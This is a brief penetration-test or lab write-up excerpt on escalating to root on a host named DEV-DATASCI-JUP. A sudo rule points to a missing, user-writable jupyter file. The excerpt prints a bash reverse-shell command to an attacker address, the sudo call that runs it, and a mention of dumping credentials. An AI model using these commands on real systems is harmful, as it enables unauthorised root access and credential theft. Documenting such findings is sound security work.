sudo with File Hijacking
It has been identified that the dev-datasci user in the WSL environment on the DEV-DATASCI-JUP(10.10.232.68) host has sudo privileges to execute the /home/dev-datasci/.local/bin/jupyter file, which does not exist but can be created for code execution.
(base) dev-datasci@DEV-DATASCI-JUP:~$ echo 'bash -c "bash -i >& /dev/tcp/10.9.0.130/1234 0>&1"' > /home/dev-datasci/.local/bin/jupyter ; chmod 755 /home/dev-datasci/.local/bin/jupyterWriting a reverse shell command to the /home/dev-datasci/.local/bin/jupyter file.
(base) dev-datasci@DEV-DATASCI-JUP:/$ sudo /home/dev-datasci/.local/bin/jupyterExecuting the sudo-privileged command.
System level compromise on the WSL environment of the DEV-DATASCI-JUP(10.10.232.68) host.
Dumping credentials…